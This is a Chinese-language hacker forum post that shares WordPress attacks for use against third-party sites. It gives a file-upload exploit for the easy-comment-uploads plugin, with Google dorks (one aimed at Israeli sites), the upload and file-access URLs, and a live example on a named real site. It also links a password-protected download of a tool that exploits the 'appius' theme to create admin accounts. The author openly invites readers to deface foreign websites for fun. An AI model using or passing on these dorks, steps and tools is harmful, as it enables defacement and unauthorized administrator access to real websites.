我去1337day看了看,一个是注入漏洞,免费的,
http://1337day.com/exploit/22846
测试了目标站,没用,一个是管理员绕过漏洞,但是要25美刀
http://1337day.com/exploit/description/22677
朋友叫我去一个国外论坛看看,我就看到了一个上传的,目标站既然也是上传,虽然只 能传txt,JPG之内的
但至少,离目标更近了,这个只能传txt,大家可以拿来日国外站,挂黑页装B玩,哈哈,下面分享代码
############################################################################
# Title : WordPress : easy-comment-uploads Upload Vulnerability
# Author : VIRUSLEGEND
# Vendor : http://www.wordpress.org
# Google Dork : inurl:/wp-content/plugins/easy-comment-uploads/
inurl:/wp-content/plugins/easy-comment-uploads/ site:il
# Tested on : Windows 7 , windows 8, linux
############################################################################
=== > Exploit :
http://TARGET/wp-content/plugins/easy-comment-uploads/upload-form.php
this link to see the allowed files to upload :
http://TARGET/wp-content/plugins/easy-comment-uploads/upload.php
upload a file .txt or any allowed file then you can access your file from here >>>
Uploaded File Access ==== > http://TARGET/wp-content/uploads/2014/10/uploadedfile.txt/
Examples :
1 - http://www.xx.net/wp-content/upl...legend.txt
2- http://www.xx.net/wp-content/uploa...legend.jpg
#################################################################
上传成功后找不到我们的txt?抓包?哦 no ,太麻烦了,直接这样找吧
地址在:wp-content/uploads/2014/11/
意思就是wp-content/uploads/2014/月/你的txt名字比如
https://www.fairyhouses.com/wp-content/uploads/2014/11/1937cn.txt
*******************************************************************
另外还有个老点的漏洞利用工具,也分享下,大家就不用去别的地方下载了
google dork:inurl:/wp-content/themes/appius
信息填好点confirm->exploit 出现success在点register。
注册的账户具有admin权限。
下载链接: http://pan.baidu.com/s/1nt4yLML 密码: qdua